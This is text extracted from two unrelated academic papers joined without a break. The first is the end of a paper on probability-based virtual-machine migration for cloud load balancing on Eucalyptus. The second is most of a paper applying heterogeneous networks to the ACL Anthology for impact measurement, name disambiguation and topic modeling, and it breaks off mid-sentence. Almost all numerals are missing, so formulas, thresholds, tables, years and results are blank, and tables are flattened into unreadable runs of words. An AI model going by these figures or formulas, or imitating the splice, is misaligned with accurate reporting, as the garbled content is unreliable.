load can be compared, each component needs to be standardized and description undignified. the cpu load benefit is achieved by using the average utilization rate of all cpu on the nodes as well as the resource usage of the specification of the memory and network bandwidth. the most important of the three load benefits to do the following definition: ) cpu load interest (cli) calculate the average utilization rate of all cpu on the nodes, and reflect the cpu load of nodes by the average utilization rate. the physical cpu number of the node is m, the utilization rate of each cpu is ci, the cpu load interest cli of the node is expressed as: ( ) ) memory load interest (mli) load of a single virtual machine memory includes memory currently in use and memory for paging. the number of virtual machines on the node is m, vusedk represents the size of the virtual machine memory being used, vchangedk represents the size of memory of user page, totalv represents total memory of nodes and is also the sum of the former. memory load of node: research and implementation of load balancing technology for cloud computing ( ) ) network bandwidth load interest (bli) the bandwidth load of a node is defined as the ratio of the sum of the bandwidth each virtual machine uses and the total bandwidth. the number of virtual machines on the node is m, vnetbandk represents bandwidth the virtual machine i is using, total band represents the maximum bandwidth of a node bli: ( ) load migration module: the migration process of virtual machine embraces the migration of the original host state and resources(internal memory, cpu and i/o device).load migration module mainly adopts operation strategies to describe the current load conditions of each server node, and makes sure to record in real time and provides load index used by the server node resources. about the heterogeneous nodes that appear in the system, load operation strategy would also like to unify the description of its standardization and eliminate the heterogeneity, in order to facilitate the use of resources. load operation strategies have selection rule, distribution rule and location rule[ ]. usually, virtual machine nodes that need to be migrated often have more than one node in cloud computing systems. equally, the destination machine of virtual machine migration has more than one server to meet the conditions of acceptance, if we take a physical node with the best performance in the current environment as the most suitable destination machine. all of the overload nodes choose the same destination node to migrate. this is bound to result in a sharp increase in the node load in a short period of time, severe cases will cause the destination node to collapse. the above phenomenon is called cluster effect [ ]. firstly we identify a set of nodes that meet the low-load, select the destination node from the cluster when locating, and focus on computing node cpu computing and memory capacity of two performance indicators. besides, if the node appears to have insufficient memory but the cpu computing capability remains or the two are in the opposite, the virtual machine on the physical node can’t run properly, and also cause waste of resources. to avoid wasting as much as possible, balance the ratio of memory resources in physical node to cpu computing resources, and achieve optimal utilization, when selecting a destination node, we should mainly consider the matching degree between the virtual machine to be migrated and the destination node. that is the proportion of cpu consumption / memory consumption. table algorithm symbol and meaning symbol meaning (cmigri)cost cpu usage rate of the node ni in the virtual machine (mmigri)cost the memory utilization of the node ni in the virtual machine (ci)cost cpu utilization ratio consumed by ni (mi)cost memory utilization occupied by ni (ci)max cpu utilization rate migration trigger threshold of node ni (ci)available cpu available rate of node ni (mi)available memory available of node ni (ucri)matched ucr matching threshold of node ni nchoosed destination node international journal of advanced network monitoring and controls volume , no. , ( ) ( ) firstly,according to measurement index ucravailable of the target node server,measurement index ucrcost of the virtual machine and the performance of the target node,we can select k destination nodes meeting the requirements from the cluster center. then the probability model of the ravailable value of the k labeled nodes is located. suppose the current available resource capability for node i is &,the probability of the node to accept the migrated virtual machine is pi.suppose the current available resource capability for node i is(ri)available. then through the above description can be learned that the node allows to select the virtual machine to migrate to the probability of pi as: ( ) suppose the destination nodes’set is {n ,n ,n ,n ,n },its capable of utilizing resources ravailable={ . , . , . , . , . },and on the basis of the above formula to get the location probability p={ %, %, %, %, %}. lastly, when host select a destination node for virtual machine dynamic migration,using a rd random function to generate a arbitrary number in [ , ]. then according to the number of probability space is in which target node,and make sure the node that virtual machine migration finally choose. the probability that those physical hosts with a strong ability to use resources is being the target node of the virtual machine migrated is also large when there is a virtual machine triggered migration. the lower the utilization ratio of node resources,the greater the possibility of selection as a destination node and the smaller on the contrary. from these examples, we can see that the more idle state a node has and the greater the probability space occupying is, and the chance that generated random number is included in this probability range is larger. thus the node is more able to be selected as a virtual machine migration destination node.in summary, to a certain extent, the probability mechanism prevents the occurrence of clustering effect, and the load balance of the server cluster in the cloud environment is better realized. . experimental results analysis . experimental environment and platform we choose high modularized and rich-interface eucalyptus suitable for c language as an experimental platform for the cloud environment.eucalyptus platform is an open source project [ ]. it is a research result to study the global hot topic, cloud computing subject, and put into practice. it implements the iaas service and enables users to allocate and manage physical resources through xen or kvm virtualization technology. eucalyptus interface can be connected to the soap and rest interface, if it is a cloud environment based on eucalyptus platform,other visitors to the non cloud environment uses the soap interface or rest interface and can be connected to the common operation. experiments using pc machines to build a system that can be used as experiment, its topology structure as shown in figure . detailed configuration of each node as table and table . research and implementation of load balancing technology for cloud computing table node hardware configuration type device cpu memory hard disk pc cc cluster controller . ghz b dicaryon . g g pc nc node controller . ghz b dicaryon . g g pc nc node controller . ghz b dicaryon . g g pc nc node controller . ghz b dicaryon . g ge table node software configuration type os platform and module pc ubuntu . mysql . +eucalyptus . + load balancing module pc ubuntu . eucalyptus . + load monitoring module + anomaly detection module + th xen . . pc ubuntu . eucalyptus . + load monitoring module + anomaly detection module + th xen . . pc ubuntu . eucalyptus . + load monitoring module + anomaly detection module + th xen . . . experimental results and analysis summarize the characteristics of the algorithm before the experiment. firstly, the load balancing module is integrated into the dynamic migration framework,and the previous dynamic migration framework is only limited to the whole process of the migration,which is considered separately from resource scheduling. in this way, when dealing with the migration problem in the cloud environment it is easy to cause a phenomenon that after solving the problem of a unilateral and then producing a new problem; secondly, new trigger rules for load prediction mechanism are used, which is different from the traditional trigger rules based on specific thresholds, and mainly solves that the transient load peak will trigger the frequent migration. lastly, we should comprehensively consider the utilization of cpu and memory when selecting rules and locating rules. especially when positioning rules, this algorithm chooses the probability mechanism used by migration destination nodes and prevents the occurrence of group effect. at the same time it realizes well the load balance of the server cluster in the cloud environment. in addition, the calculation of the location probability of each node does not impact relatively and mutually independent, under these circumstances the balance of the cloud data center will be better. the first set of simulation experiment designed carried out the test about migration trigger time. select one of the nodes to monitor the cpu load utilization rate,and set the threshold of . .shown as figure , when t is equal to ,once cpu load of nodes exceeds the threshold,the traditional trigger rules will immediately trigger a migration[ ]. however, using predict trigger rules can partly predict that the node load is on the decline, which does not trigger the migration. in addition, when t is equal to , because the forecast data predicts the next trigger will have the trigger peak, so the first trigger did not immediately exercise.but when t is equal to , the trigger is migrated, and compared with the traditional algorithm based on threshold value, three migrations will be triggered during this period and cost vast virtual machine migration resources, which avoids the additional waste. international journal of advanced network monitoring and controls volume , no. , figure. experimental environment topology figure. compared with the traditional methods in the emulation cloud environment of experiment , three machines have the same configuration on the nodes, and have initialized different timely load conditions.we set the use ratio of the system resource % and take it as overload limit of the load, at the same time, we stipulate that the request array have the same service type. initialized load condition of each node need the artificial set, and are set the request array distributed by task scheduling. each of the calculation of the system resource utilization and the rules of dynamic migration adopts the methods introduced by the above section. the system resource utilization shown as figure . we test on selecting a location algorithm of migration destination nodes and take no load balancing algorithm as the baseline, compared with the load balancing algorithm based on optimal adaptive rule. the load balancing of the system is evaluated by the standard deviation of the load benefit. experimental results are shown in figure , figure and figure . figure. node load variation figure. cpu load balancing in the figure , from the initial pc start node has been in a super load state, start from the initial pc nodes has been in a over-load state, but there is no immediate migration equilibrium which is due to the role of the trigger rule.this experiment also verifies the effectiveness of the trigger rules based on the prediction from the side. when t is equal to , pc will trigger migration, and migrate the virtual machine to pc ,then the utilization rate of pc will obviously increase. although pc has eased, due to the migration of virtual machines, and the utilization rate of pc and pc was higher than that of pc . when t is equal to . the virtual machine on pc and pc migrates each load of them to pc , at the end of this balanced period, the resource utilization rate of each node is similar and in the balanced state. then approximate load balancing is achieved. according to figure , we can see that cpu load standard deviation distribution is more balanced generally in this algorithm[ ]. generally, the standard deviation is mainly distributed in the following . however the memory and network bandwidth have obvious advantages, the resource of each node in research and implementation of load balancing technology for cloud computing the colony can be use reasonably. shown as the follow figure. figure. memory load balancing figure. network bandwidth load balance we optimize and realize the design about load balance in cloud environment, and make relevant rules as far as platform completely modular, such as trigger rules,selection rules and location rules, and so on. the traditional methods based on the load balance system of cloud computing analyze anew the problem and improve it. the trigger rules is not simply based on threshold value, but on probability to predict. the selection and location rules both consider adequately cpu and memory usage, and analyze the best way of migration from overall consumption. the more available resource a node has, the easier the process that virtual machine is migrated to the most suitable destination node is. after the overall theoretical system is integrated, we conduct an experiment and analyze the result. contrastive analyze cpu, memory, bandwidth, we can see the obvious performance advantages. . summary and outlook the passage analyze concretely how load balance realize, design the concrete details of load balance module and has a further analysis that how to set up the frame of dynamic migration, and then set index of evaluating load balance. the characteristic of this aspect is the probability based, and solves the resource load in cloud environment, which is realized in the dynamic migration. the final result shows that algorithm fusion suggested has obvious performance advantages. now we just consider intensively the load balance of infrastructure later, and analyze concretely the location rules on load migration module. but about selection rules, we consider it from the ratio aspect, from consumption of overall migration, then from re-migrated aspect of available resource, and combine with the consumption about the increase of trigger rules to migration time. in addition, information to initialize of algorithm is set by manual work. we collect load information with periodicity, and the periodicity is also set by manual work. we need to make sure the sampling period in the follow- up work. references [ ]approach to cloud computing[m]. beijing: posts and telecom press, : . [ ] li yong: the study and analyze based on the dynamic migration tecnology of the virtual machine[academic dissertation]. nudt, . [ ] li zhiwei, wu qingbo, tan yusong. the study of virtual machine dynamic migration based on the device agent machining. application research of computers. the th volume, . . international journal of advanced network monitoring and controls volume , no. , [ ] kaiqi xiong, harry perros, service performance and analysis in cloud computing, [c] in proceeding of congress on services, july : - [ ] shi yangbin. a kind of load balancing algorithm based on the virtual machine live migration in cloud environment. [master’s thesis]. shanghai: fudan university, . [ ] dina p, o halloran d. the statistical properties of host load, in to appear in the forth workshop on languages, compilers,and run-time systems for scalable computers(lcr ) and cmu tech[eb/ol]. [ ] barnsley m. fractals everywhere[m]. new york: academic press, : . [ ] zhou wenyu, chen huaping, yang shoubao, fangjun. the virtual machine cluster resource scheduling based onmigration [j]. journal of huazhong university of science and technology (jcr science edition), , ( ) supplementi: - . [ ] chang f, dean j, chemawat s. bigtable: a distributed storage system for structured data [j]. acm transactions on computer systems, , ( ): l- . [ ] chen guoliang, sun guangzhong, xu yun. sabina chinensis integration research status and development trend of parallel computing [j]. science, , ( ): - . acknowledgements this work was supported by the national natural science foundation of china (no. , no. ), innovation program of shanghai municipal education commission (no. zz ), and the hujiang foundation (c ). biographies sun hong: female, han, -, from beijing, china, master, associate professor, school of optical- electrical and computer engineering university of shanghai for science and technology, master tutor, associate professor direction of research; business schools university of shanghai for science and technology doctor graduate student; the main research direction: computer network communication and clouds computing, management science and engineering, management information and decision support system. email: sunhong@usst.edu.cn, telephone: wang weifeng: male, han, -, master student, school of optical-electrical and computer engineering university of shanghai for science and technology; the main research direction: cloud computing and management information system. email: wwfhuo@ .com chen shiping: male, han, -, from zhejiang, china,professor, ph.d.doctoral tutor business schools university of shanghai for science and technology,research direction:computer network communication and clouds computing, management science and engineering. email:chensp@usst.edu.cn xu liping: female, han, -, master, associate professor, university of shanghai for science and technology; the main research direction:cloud computing and management information system. email: @qq.com heterogeneous networks and their applications: scientometrics, name disambiguation, and topic modeling heterogeneous networks and their applications: scientometrics, name disambiguation, and topic modeling ben king, rahul jha department of eecs university of michigan ann arbor, mi {benking,rahuljha}@umich.edu dragomir r. radev department of eecs school of information university of michigan ann arbor, mi radev@umich.edu abstract we present heterogeneous networks as a way to unify lexical networks with relational data. we build a unified acl anthology network, tying together the citation, author collaboration, and term-cooccurence networks with affiliation and venue relations. this representation proves to be convenient and allows problems such as name disambiguation, topic modeling, and the mea- surement of scientific impact to be easily solved using only this network and off-the-shelf graph algorithms. introduction graph-based methods have been used to great ef- fect in nlp, on problems such as word sense disam- biguation (mihalcea, ), summarization (erkan and radev, ), and dependency parsing (mcdon- ald et al., ). most previous studies of networks consider networks with only a single type of node, and in some cases using a network with a single type of node can be an oversimplified view if it ignores other types of relationships. in this paper we will demonstrate heterogeneous networks, networks with multiple different types of nodes and edges, along with several applications of them. the applications in this paper are not pre- sented so much as robust attempts to out-perform the current state-of-the-art, but rather attempts at being competitive against top methods with little effort be- yond the construction of the heterogeneous network. throughout this paper, we will use the data from the acl anthology network (aan) (bird et al., ; radev et al., ), which contains additional metadata relationships not found in the acl anthol- ogy, as a typical heterogeneous network. the results in this paper should be generally applicable to other heterogeneous networks. . heterogeneous aan schema we build a heterogeneous graph g(v,e) from aan, where v is the set of vertices and e is the set of edges connecting vertices. a vertex can be one of five semantic types: {paper, author, venue, institution, term}. an edge can also be one of five types, each connecting different types of vertices: • author — [writes] — paper • paper — [cites] — paper • paper — [published in] — venue • author — [affiliated with] — institution • paper — [contains] — term all of this data, except for the terms, is available for all papers in the release of aan. terms are extracted from titles by running textrank (mihal- cea and tarau, ) on np-chunks from titles and manually filtering out bad terms. we show the usefulness of this representation in several applications: the measurement of scien- tific impact (section ), name disambiguation (sec- tion ), and topic modeling (section ). the hetero- geneous network representation provides a simple framework for combining lexical networks (like the term co-occurence network) with metadata relations from a source like aan and allows us to begin to develop nlp-aware methods for problems like sci- entometrics and name disambiguation, which are not usually framed in an nlp perspective. for a joint meeting of venues a and b publishing a paper x, two edges (x, a) and (x, b) are created. author-affiliation edges are weighted according to the number of papers an author has published from an institution. transactions of the association for computational linguistics, ( ) – . action editor: lillian lee. submitted / ; revised / ; published / . c© association for computational linguistics. scientific impact measurement the study of scientometrics, which attempts to quantify the scientific impact of papers, authors, etc. has received much attention recently, even within the nlp community. in the past few years, there have been many proposed measures of scientific im- pact based on relationships between entities. intu- itively, a model that can take into account many dif- ferent types of relationships between entities should be able to measure scientific impact more accu- rately than simpler measures like citation counts or h-index. we propose using pagerank on the heterogeneous aan (page et al., ) to measure scientific impact. since changes in the network schema can affect the relative rankings between different types of entities, this method is probably not appropriate for compar- ing entities of two different types against each other. but between nodes of the same type, this measure is an appropriate (and as we will show, accurate) way to compare impacts. we see this method as a first logical step in the direction of heterogeneous network-based sciento- metrics. this method could easily be extended to use a directed schema (kurland and lee, ) or a schema that is aware of the lexical content of citation sentences, such as sentiment-based signed networks (hassan et al., ). determining the intrinsic quality of scientific im- pact measures can be difficult since there is no way to collect gold standard measurements for real- world entities. previous studies have attempted to show that their measures give high scores to a few known high-impact entities, e.g. nobel prize win- ners (hirsch, ), or have performed a statistical component analysis to find the most important mea- sures in a group of related statistics (bollen et al., ). our approach, instead, is to generate real- istic data from synthetic entities whose impacts are known. we had considered alternative formulations that did not rely on synthetic data, but each of them presented problems. when we attempted manual prominence annotation for aan data, the inter- judge agreement (measured by spearman correla- tion) in our experiments ranged from decent ( . in the case of institutions) to poor ( . for authors) to nearly random ( . for terms), far too low to use in most cases. we also considered evaluating prominence measures by their ability to predict fu- ture citations to an entity. citations are often used as a proxy for impact, but our measurements have found that correlation between past citations and fu- ture citations is too high for citation prediction to be a meaningful evaluation . . creating a synthetic aan in network theory, a common technique for testing network algorithms when judgments of real-world data are expensive or impossible to obtain is to test the algorithm on a synthetic network. to create such a synthetic network, the authors define a simple, but realistic generative process by which the real-world networks of interest may arise. the properties of the network are measured to ensure that it replicates certain observable behaviors of the real-world net- work. they can then test network algorithms to see how well they are able to recover the hidden param- eters that generated the synthetic network. (pastor- satorras and vespignani, ; clauset et al., ; karrer and newman, ) we take a two-step approach to generating this synthetic data, first generating entities with known impacts, and second, linking these entities together according to their latent impacts. our heuristic is that high impact entities should be linked to other high impact entities and vice-versa. as in the net- work theory literature, we must show that this data reflects important properties observed in the true aan. one such property is that the number of citations per paper follows a power law distribution (redner, ). we observe this behavior in aan along with several other small-world behaviors, such as a small diameter, a small average shortest path length, and a high clustering coefficient in the coauthorship graph. we strive to replicate these properties in our syn- thetic data. most existing impact measurements require access to at least one year’s worth of citation information. the spearman correlation between the number of citations received after one year and after five years is . with correlation between suc- cessive years as high as . . practically this means that the measures that best correlate with citations after five years are exactly those that best correlate with citations after one year. since scientific impact measures attempt to quan- tify the true impact of entities, we can use these mea- sures to help understand how the true impact mea- sures are distributed across different entities. in fact, citation counts, being a good estimate of impact, can be used to generate these latent impact variables for each entity. for each type of entity (papers, authors, institutions, venues, and terms), we create a latent impact by sampling from the appropriate citation count distribution. after sampling, all the impacts are normalized to fall in the [ , ] interval, with the highest-impact entity of each type having a latent impact of . additive smoothing is used to avoid having an impact of . once we have created the entities, our method for placing edges is most similar to the erdős- réyni method for creating random graphs (erdős and rényi, ), in which edges are distributed uniformly at random between pairs of vertices. in- stead of distributing links uniformly, links between entities are sampled proportionally to i(a)i(b)( − (i(a) − i(b)) ), where i(x) is the latent impact of entity x. we tried several other formulae that failed to replicate the properties of the real aan. the i(a)i(b) part of the formula above reflects a pref- erence for nodes of any type to connect with high- impact entities (e.g., major conferences receive many submissions even though most submissions will be rejected), but the − (i(a) − i(b)) part also reflects the reality that entities of similar promi- nence are most likely to attach to each other (e.g., well-known authors publish in major conferences, while less well-known authors may publish mostly in lesser-known workshops). using this distribution, we randomly sample links between papers and authors; authors and institu- tions; papers and venues; and papers and terms. the only exception to this was paper-to-paper citation links, for which we did not expect this same be- havior to apply, as low-impact papers regularly cite high-impact papers, but not vice-versa. to model ci- tations, we selected citing papers uniformly at ran- dom and cited papers in proportion to their impacts. (albert and barabási, ) finally, we generated a network equal in size to aan, that is, with the exact same numbers of pa- pers, authors, etc. and the exact same number of relationship true value synth. value paper-citations power law coeff. . . diameter avg. shortest path . . collaboration network clustering coeff. . . table : network properties of the synthetic aan compared with the true aan. paper-author links, paper-venue links, etc. table compares the observed properties of the true aan with the observed properties of this synthetic version of aan. none of the statistics are exact matches, but when building random graphs, it is not uncommon for measures to differ by many orders of magnitude, so a model that has measures that are on the same order of magnitude as the observed data is generally considered to be a decent model (newman and park, ). . measuring impact on the synthetic aan this random network is, of course, still imperfect in some regards. first of all, it has no time aspect, so it is not possible for impact to change over time, which means we cannot test against some impact measures that have a time component like citer- ank (maslov and redner, ). second, there are some constraints present in the real world that are not enforced here. because the edges are randomly selected, some papers have no venues, while others have multiple venues. there is also nothing to en- force certain consistencies, such as authors publish- ing many papers from relatively few institutions, or repeatedly collaborating with the same authors. we had also considered using existing random graph models such as the barabási-albert model (barabási and albert, ), which are known to produce graphs that exhibit power law behavior. these models, however, do not provide a way to re- spect the latent impacts of the entities, as they add links in proportion only to the number of existing links a node has. we measure the quality of impact measures by comparing ranked lists: the ordering of the entities paper measure agreement heterogeneous network pagerank . citation network pagerank . citation count . author measure agreement heterogeneous network pagerank . coauthorship network pagerank . h-index (hirsch, ) . aggregated citation count . i -index . institution measure agreement heterogeneous network pagerank . h-index (mitra, ) . aggregated citation count . venue measure agreement heterogeneous network pagerank . h-index (braun et al., ) . aggregated citation count . impact factor . venue citation network pagerank (bollen et al., ) . table : agreement of various impact measures with the true latent impact. by their true (but hidden) impact against their order- ing according to the impact measure. the agree- ment between these lists is measured by kendall’s tau. table compares several well-known impact measures with our impact measure, pagerank cen- trality on the heterogeneous aan network. we find that some popular methods, such as h-index (hirsch, ) are too coarse to accurately capture much of the underlying variation. there is a version of kendall’s tau that accounts for ties, and while this metric slightly helps the coarser measures, pagerank on the heterogeneous network is still the clear win- ner. when comparing different ordering methods, it is natural to wonder which of entities the orderings disagree on. in general, non-heterogeneous mea- sures like h-index or collaboration network pager- ank, which only focus on one type of relationship can suffer when the entity in question has an impor- tant relationship of another type. for example, if an author is highly cited, but mostly works alone, his r el at iv e pa ge ra nk acl emnlp coling naacl figure : evolution of conference impacts. the y- axis measures relative pagerank, the entity’s pager- ank relative to the average pagerank in that year. contribution would be undervalued in the collabo- ration network, but would be more accurate in the heterogeneous network. the majority of the differences between the im- pact measures, though, tend to be in how they han- dle entities of low prominence. it seems that, for the most part, there is relatively little disagreement in the orderings of high-impact entities between differ- ent impact measures. that is, most highly prominent entities tend to be highly rated by most measures. but when an author or a paper, for example, only has one or two citations, it can be advantageous to look at more types of relationships than just citations. the paper may be written by an otherwise prominent author, or published at a well-known venue, and hav- ing many types of relations at its disposal can help a method like heterogeneous network pagerank better distinguish between two low-prominence entities. . top-ranked entities according to heterogeneous network pagerank table shows the papers, authors, institutions, venues, and terms that received the highest pager- ank in the heterogeneous aan. it is obvious that the top-ranked entities in this network are not simply the most highly cited entities. this ranking also does not have any time bias toward the entities that are currently prominent, as some of the top authors were more prolific in previ- ous decades than at the current time. we also see this effect with coling, which for many of the early years, is the only venue in the acl anthology. top papers top authors top institutions top venues top terms − building a large annotated corpus of english: the penn treebank jun’ichi tsujii carnegie mellon university coling − translation − the mathematics of statistical machine translation: parameter estimation aravind k. joshi university of edinburgh acl speech − attention, intentions, and the structure of discourse ralph grishman university of pennsylvania hlt parsing − a maximum entropy approach to natural language processing hitoshi isahara massachusetts institute of technology eacl machine translation − bleu: a method for automatic evaluation of machine translation yuji matsumoto saarland university lrec generation − a maximum-entropy-inspired parser kathleen r. mckeown ibm t.j. watson research center − naacl evaluation a stochastic parts program and noun phrase parser for unrestricted text eduard hovy cnrs emnlp grammar a systematic comparison of various statistical alignment models christopher d. manning university of tokyo computational linguistics dialogue transformation-based error-driven learning and natural language processing: a case study in part-of-speech tagging yorick wilks stanford university ijcnlp knowl- edge a maximum entropy model for part-of-speech tagging hermann ney bbn technologies workshop on speech and natural language discourse table : the entities of each type receiving the highest scores from the heterogeneous network pagerank impact measure along with their respective changes in ranking when compared to a simple citation count measure. one possible way to address this is to use a narrower time window when creating the graph, such as only including edges from the previous five years. we apply this technique in the following section. . entity impact evolution the heterogeneous graph formalism also provides a natural way to study the evolution of impact over time, as in (hall et al., ), but at a much finer granularity. hall et al. measured the year-by-year prominence of statistical topics, but we can measure year-by-year prominence for any entity in the graph. to measure the evolution of impacts over the years, we iteratively create year-by-year versions of the heterogeneous aan. each of these graphs con- tains all entities along with all edges occurring in a five year window. due to space, we cannot com- prehensively exhibit this technique and the data it produces, but as a brief example, in figure , we show how the impacts of some major nlp confer- ences changes over time. the graph shows that naacl and emnlp have been steadily gaining prominence since their intro- ductions, but also shows that acl has had to make up a lot of ground since to surpass coling. we also notice that all the major conferences have grown in impact since , and believe that as the field continues to grow, the major conferences will continue to become more and more important. name disambiguation we frame network name disambiguation in a link prediction setting (taskar et al., ; liben-nowell and kleinberg, ). the problems of name dis- ambiguation and link prediction share many char- acteristics, and we have found that if two ambigu- ous name nodes are close enough to be selected by a link-prediction method, then they likely correspond to the same real-world author. we intend to show that the heterogeneous biblio- graphic network can be used to better disambiguate author names than the author collaboration network. the heterogeneous network for this problem con- tains papers, authors, terms, venues, and institutions. we compare several well-known network similarity measures from link prediction by transforming the network distance measure precision recall f -score rand index purity nmi heterogeneous truncated commute time . . . . . . heterogeneous shortest path . . . . . . heterogeneous propflow . . . . . . coauthorship truncated commute time . . . . . . coauthorship shortest path . . . . . . coauthorship propflow . . . . . . coauthorship ghost . . . . . . table : performance of different networks and distance measures on the author name disambiguation task. the performance measures are averaged over the sets of two, three, and four authors. rand index is from (rand, ) and nmi is an abbreviation for normalized mutual information (strehl and ghosh, ) similarities to distances and inducing clusters of au- thors based on these distances. we compare three distance measures: shortest path, truncated commute time (sarkar et al., ), and propflow (lichtenwalter et al., ). short- est path distance can be a useful metric for author disambiguation because it is small when two am- biguous nodes are neighbors in the graph or share a neighbor. its downside is that it only considers one path between nodes, the shortest, and cannot take advantage of the fact that there may be many short paths between two nodes. truncated commute time is a variant of commute time where all paths longer than some threshold are truncated. the truncation threshold l should be set such that no semantically meaningful path is trun- cated. we use a value of ten for l in the heteroge- neous graph and three in the coauthorship graph . the advantage of truncated commute time over or- dinary commute time is simpler calculation, as no paths longer than l need be considered. the down- side of this method is that large branching factors tend to lead to less agreement between commute time and truncated commute time. propflow is a quantity that measures the proba- bility that a non-intersecting random walk starting at node a reaches node b in l steps or fewer, where l is again a threshold. as before, l should be a bound on the length of semantically meaningful paths, so we use the same values for l as with truncated commute time. of course, propflow is not a metric, which is this is a standard coauthorship graph with the edge weights equal to the number of publications shared between authors. the heterogeneous network does not have author-to-author links, as authors are linked by paper nodes. required for some clustering methods. we use the following equation to transform propflow to a met- ric: d(a,b) = propflow(a,b) − . with each of the distance measures, we apply the same clustering method: partitioning around medoids, with the number of clusters automatically determined using the gap statistic method (tibshi- rani et al., ). we create the null distribution needed for the gap statistic method by many itera- tions of randomly sampling distances from the com- plete distance matrix between all nodes in the graph. the gap statistic method automatically selects the number of clusters from two, three, or four author clusters. we compare our methods against ghost (fan et al., ), a high-performance author disambigua- tion method based on the coauthorship graph. . data to generate name disambiguation data, we use the pseudoword method of (gale et al., ). specif- ically, we choose two or more completely random authors and conflate them by giving all instances of both authors the same name. we let each paper written by this pseudoauthor be an instance to be clustered. the clusters produced by any author dis- ambiguation method can then be compared against the papers actually written by each of the two au- thors. this method, of course, relies on having all of the underlying authors completely disambiguated, which aan provides. this method is used to create distambiguation sets with two authors, for three authors, and for four authors. . results table shows the performance of author name dis- ambiguation with different networks and distance metrics. f -score is the measure that is most of- ten used to compare author disambiguation methods. both propflow and shortest path similarity on the heterogeneous network perform quite well accord- ing this measure, as well as the other reported mea- sures. while comparable recall can be achieved us- ing only the coauthorship graph, the heterogeneous graph allows for much higher precision. random walk topic model here we present a topic model based entirely on graph random walks. this method is not truly a statistical model as there are no statistical parame- ters being learned, but rather a topic-discovery and -assignment method, attempting to solve the same problem as statistical topic models such as proba- bilistic latent semantic analysis (plsa) (hofmann, ) or latent dirichlet allocation (lda) (blei et al., ). in the absence of better terminology, we use the name random walk topic model. while this method does not have the robust math- ematical foundation that statistical topic models pos- sess, in its favor it has modularity, simplicity, and interpretability. this language model is modular as it completely separates the discovery of topics from the association of topics with entities. it is sim- ple because it requires only a clustering algorithm and random walk algorithms, instead of complex in- ference algorithms. the method also does not re- quire any modification if the topology of the net- work changes, whereas statistical models may need an entirely different inference procedure if, e.g., au- thor topics are desired in addition to paper topics. thirdly this method is easily interpretable with top- ics provided by clustering in the word-relatedness graph and topic association based on random walks from entities to topics. . topics from word graph clustering from the set of acl anthology titles, we create two graphs: ( ) a word relatedness graph by cre- ating a weighted link between each pair of words corresponding to the propflow (lichtenwalter et al., ) measure between them on the full heteroge- neous graph and ( ) a word co-occurence graph by creating a weighted link between each pair of words corresponding to the number of titles in which both words occur. both of these graphs are then clustered using graph factorization clustering (gfc). gfc is a soft clustering algorithm for graphs that models graph edges as a mixture of latent node-cluster association variables. (yu et al., ) given a word graph g with vertices v and ad- jacency matrix [w]ij, gfc attempts to fit a bipar- tite graph k(v,u) with adjacency matrix [b]ij onto this data, with the m nodes of u representing the clusters. whereas in g, similarity between two words i and j can be measured with wij, we can similarly measure their similarity in k with w′ij =∑m p= bipbjp λp where λp = ∑n i= bip is the degree of vertex p ∈ u. essentially the bipartite graph attempts to approx- imate the transition probability between i and j in g with the sum of transition probabilities from i to j through any of the m nodes in u. yu, et al. ( ) present an algorithm for minimizing the divergence distance `(x,y) = ∑ ij(xijlog xij yij −xij + yij) be- tween [w]ij and [w′]ij. we run gfc with this distance metric and m = clusters on the word graph until convergence (change in log-likelihood < . %). after conver- gence, the nodes in u become the clusters and the weights bip (constrained to sum to for each clus- ter) become the topic-word association scores. examples of some topics found by this method are shown in table . from manual inspection of these topics, we found them to be very much like topics created by statistical topic models. we find instances of all the types of topics listed in (mimno et al., ): chained, intruded, random, and unbal- anced. for an evaluation of these topics see sec- tion . . . . entity-topic association to associate entities with topics, we first create the heterogeneous network as in previous sections, adding links between papers and their title words, along with links between words and the topics that were discovered in the previous section. word-topic links are also weighted according to the weights word sense induction sense disambiguation word induction unsupervised clustering senses based similarity chinese crfs + their applications entity named recognition random conditional fields chinese entities biomedical segmentation dependency parsing parsing dependency projective probabilistic incremental deterministic algorithm data syntactic trees tagging models tagging model latent markov conditional random parsing unsupervised segmentation multi-doc summarization summarization multi document text topic based query extractive focused summaries chinese word segmentation word segmentation chinese based alignment character tagging bakeoff model crf lexical semantics lexical semantic distributional similarity wordnet resources lexicon acquistion semantics representation cross-lingual ir cross lingual retrieval document language linguistic multi person multilingual coreference generation for summar. sentence based compression text summarization ordering approach ranking generation spoken language speech recognition automatic prosodic tagging spontaneous news broadcast understanding conversational french function words de la du des le automatique analyse une en pour question answering question answering system answer domain retrieval web based open systems unsupervised learning unsupervised discovery learning induction knowledge graph acquisition concept clustering pattern svms for nlp support vector machines errors space classification correcting word parsing detecting maxent models entropy maximum approach based attachment model models phrase prepositional disambiguation dialogue systems dialogue spoken systems human conversational multi interaction dialogues utterances multimodal semantic role-labeling semantic role labeling parsing syntactic features ill dependency formed framenet smt based translation machine statistical phrase english approach learning reordering model coreference resolution resolution coreference anaphora reference pronoun ellipsis ambiguity resolving approach pronominal semi- and weak-supervision learning supervised semi classification active data clustering approach graph weakly information retrieval based retrieval similarity models semantic space model distance measures document discourse discourse relations structure rhetorical coherence temporal representation text connectives theory cfg parsing context free grammars parsing linear probabilistic rewriting grammar systems optimal min. risk train. and decod. minimum efficient training error rate translation risk bayes decoding statistical phonology phoneme conversion letter phonological grapheme rules applying transliteration syllable sound sentiment sentiment opinion reviews classification mining polarity analysis predicting product features neural net speech recog. speech robust recognition real network time neural networks language environments finite state methods state finite transducers automata weighted translation parsing incremental minimal construction mechanical turk mechanical turk automatic evaluation amazon techniques data articles image scientific table : top words for several topics created by the co-occurence random walk topic model. the left column is a manual label. topic topic translation . parsing . machine . dependency . statistical . projective . machine translation . k-best spanning tree parsing . better hypothesis testing for statistical machine translation: controlling for optimizer instability . pseudo-projective dependency parsing . filtering antonymous, trend- contrasting, and polarity-dissimilar distributional paraphrases for improving statistical machine translation . shift-reduce dependency dag parsing . knight, kevin . nivre, joakim . koehn, philipp . johnson, mark . ney, hermann . nederhof, mark-jan . rwth aachen university . vaxjo university . carnegie mellon university . brown university . university of southern california . university of amsterdam . workshop on statistical machine translation . acl . emnlp . emnlp . coling . conll . table : examples of entities associated with selected topics. determined by gcf. we then simply take random walks from topics to entities and measure the pro- portion at which the random walk arrives at each en- tity of interest. these proportions become the entity- topic association scores. for example, if we wanted to find the authors most associated with topic , we would take a num- ber of random walks (say , ) starting at topic and terminating as soon as the random walk first reaches an author node. measuring the proportion at which random walks arrive at each allows us to compute an association score between topic and each author. a common problem in random walks on large graphs is that the walk can easily get “lost” between two nodes that should be very near by taking a just a few steps in the wrong direction. to keep the ran- dom 